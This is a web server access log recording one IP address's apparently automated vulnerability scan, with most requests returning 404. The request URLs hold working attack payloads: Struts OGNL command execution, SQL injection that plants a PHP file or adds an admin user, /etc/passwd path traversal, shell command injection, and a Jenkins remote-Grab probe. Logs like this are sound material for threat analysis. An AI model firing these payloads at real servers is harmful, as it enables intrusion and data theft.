195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:49 +0000] POST /Servlet/Skins HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:33:51 +0000] GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:33:53 +0000] GET / HTTP/1.1 200 11204
- - - [18/Nov/2024:23:33:55 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:33:57 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:33:59 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:34:01 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:34:03 +0000] POST /Tool/uploadfile.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:34:04 +0000] GET /2p2ltq1qIkG91vD1bhyJD5ZDeQz.txt HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:34:06 +0000] GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:34:08 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:34:10 +0000] POST /task/submit/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:34:11 +0000] POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:34:13 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:34:16 +0000] GET /file=web_assets/../config.json HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:34:17 +0000] PATCH /mgmt/tm/auth/user/tVouA HTTP/1.1 501 1095
195.164.49.69 - - [18/Nov/2024:23:34:19 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:34:21 +0000] POST /modules/appagebuilder/apajax.php?rand=2350808590473 HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:34:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:34:25 +0000] GET /solr/admin/info/properties:/admin/info/key HTTP/1.1 404 1140
195.164.49.69 - - [18/Nov/2024:23:34:27 +0000] GET /asispanel/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:34:44 +0000] GET /workflow/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:34:44 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:44 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:45 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:34:46 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:35:10 +0000] GET /2p2ltrMCPxQQ8157HNDkOmntn3z.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:35:11 +0000] GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:35:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:35:34 +0000] GET /home/llubu.php HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:35:45 +0000] POST /eps/api/resourceOperations/upload?token=327DEF2D2753E359FE4D591A6B750D40 HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:23:35:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:35:49 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [18/Nov/2024:23:35:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:35:51 +0000] POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:35:54 +0000] POST /service_transport/service.action HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:35:55 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:35:57 +0000] POST /as/wapi/vmp HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:36:01 +0000] POST /modules/appagebuilder/apajax.php?rand=3537528008775 HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:36:03 +0000] POST /directdata/direct/router HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:36:06 +0000] POST /index.php?m=member&f=login_save HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:36:08 +0000] POST /modules/cartabandonmentpro/upload.php HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:23:36:14 +0000] POST /login.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:36:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:36:18 +0000] GET /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgZWNobyBtZDUoIndlYXZlci1ncm91cC14bWwtc3FsaSIpO3VubGluayhfX0ZJTEVfXyk7Pz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3ZyZjZlLnBocCdd HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:36:20 +0000] POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:36:22 +0000] GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:23:36:24 +0000] POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:36:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:36:28 +0000] GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 404 1577
195.164.49.69 - - [18/Nov/2024:23:36:30 +0000] GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:23:36:33 +0000] GET /logo/2p2ltw5ajrwfeKDrvrsLfBfxBbS.txt HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:36:35 +0000] GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:36:37 +0000] GET /LmSYE.txt HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:36:38 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:36:40 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:36:42 +0000] GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:36:44 +0000] GET /2p2ltxRvcJEq529DqHEUObL5nfP.txt HTTP/1.1 404 1105
- - - [18/Nov/2024:23:36:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:36:48 +0000] GET /modules/cartabandonmentpro/uploads/bbbabbc.php.png HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:23:36:50 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:36:53 +0000] GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:36:57 +0000] GET /vrf6e.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:36:59 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:23:37:01 +0000] GET /mifs/aad/api/v2/admins/users HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:23:37:03 +0000] POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:37:05 +0000] GET /nifi-api/process-groups/root HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:37:07 +0000] GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:23:37:08 +0000] GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:37:10 +0000] GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:37:12 +0000] GET /resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf HTTP/1.1 404 1145
195.164.49.69 - - [18/Nov/2024:23:37:14 +0000] GET /cacti/cmd_realtime.php?1+1&&id=1+1+1 HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:37:16 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:37:18 +0000] OPTIONS / HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:23:37:20 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [18/Nov/2024:23:37:21 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:37:23 +0000] GET /jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:23:37:25 +0000] GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:37:27 +0000] GET /index.php?page=/etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:37:29 +0000] GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:37:32 +0000] GET /wp-admin/install.php?step=1 HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:37:33 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:37:35 +0000] GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272p2lu9m3yjycp1pp1gbvf54zxl3%27%2C+NULL%2C+%27DC62AD28E4CFE0F57E3AE66FEE695EBA%27%2C+%272p2lu9m3yjycp1pp1gbvf54zxl3FirstName%27%2C+%272p2lu9m3yjycp1pp1gbvf54zxl3LastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272p2lu9m3yjycp1pp1gbvf54zxl3%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- HTTP/1.1 404 1110
- - - [18/Nov/2024:23:37:37 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:37:38 +0000] GET /secure/ContactAdministrators!default.jspa HTTP/1.1 404 1119
83.212.98.101 - - [18/Nov/2024:23:37:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:37:40 +0000] GET /api/index.php/v1/config/application?public=true HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:37:42 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:37:44 +0000] GET /inventory HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:37:46 +0000] GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1 404 1130
- - - [18/Nov/2024:23:37:48 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:37:49 +0000] GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:37:51 +0000] GET /groovyconsole HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:37:53 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:37:55 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:37:57 +0000] GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:37:59 +0000] GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:23:38:01 +0000] GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:38:03 +0000] GET /grid/console HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:38:05 +0000] GET /+CSCOE+/session_password.html HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:38:07 +0000] GET /jquery-file-upload/server/php/ HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:38:10 +0000] GET /Admin/Admin.aspx HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:38:12 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:38:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:38:16 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:38:18 +0000] GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:38:21 +0000] GET /api/v1/config/application?public=true HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:38:23 +0000] GET /etc/groovyconsole.html HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:38:25 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:38:27 +0000] GET /console HTTP/1.1 404 1081
- - - [18/Nov/2024:23:38:49 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:38:51 +0000] GET /?pum_action=tools_page_tab_system_info HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:38:53 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:38:55 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:38:59 +0000] POST /adxmlrpc.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:39:00 +0000] GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20wPSobMFbmr.txt%60 HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:39:02 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:39:04 +0000] GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Erlrd.txt HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:39:06 +0000] POST /forgot_password.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:39:11 +0000] GET /assets/app/something/services/AppModule.class/ HTTP/1.1 404 1140
195.164.49.69 - - [18/Nov/2024:23:39:14 +0000] POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:39:17 +0000] POST /axis2/axis2-admin/login HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:39:18 +0000] POST /axis2-admin/login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:39:26 +0000] GET /cgi-bin/test.cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:39:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:39:29 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:39:29 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:39:29 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:39:29 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:39:30 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:39:30 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:39:30 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:39:36 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [18/Nov/2024:23:39:43 +0000] POST /auth/newpassword HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:39:45 +0000] POST /session/create HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:39:47 +0000] POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:39:49 +0000] POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:39:50 +0000] GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:40:05 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:40:09 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:23:40:10 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:40:10 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:40:10 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:40:19 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:40:21 +0000] POST /_async/AsyncResponseService HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:40:23 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:40:25 +0000] GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1 404 1141
195.164.49.69 - - [18/Nov/2024:23:40:27 +0000] GET /wPSobMFbmr.txt HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:40:29 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:40:30 +0000] GET /include/rlrd.txt HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:40:33 +0000] POST /home/download HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:40:34 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:40:41 +0000] GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:40:43 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:40:45 +0000] POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:40:47 +0000] GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:40:49 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
83.212.98.101 - - [18/Nov/2024:23:40:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:40:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:40:54 +0000] GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 404 1150
195.164.49.69 - - [18/Nov/2024:23:40:56 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:41:00 +0000] GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 404 1365
195.164.49.69 - - [18/Nov/2024:23:41:02 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:41:04 +0000] POST /dfsms/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:41:05 +0000] GET /_async/favicon.ico HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:41:07 +0000] GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 200 11204
- - - [18/Nov/2024:23:41:11 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:41:13 +0000] POST /wp-login.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:41:14 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:41:17 +0000] POST /hms/user-login.php HTTP/1.1 404 1096
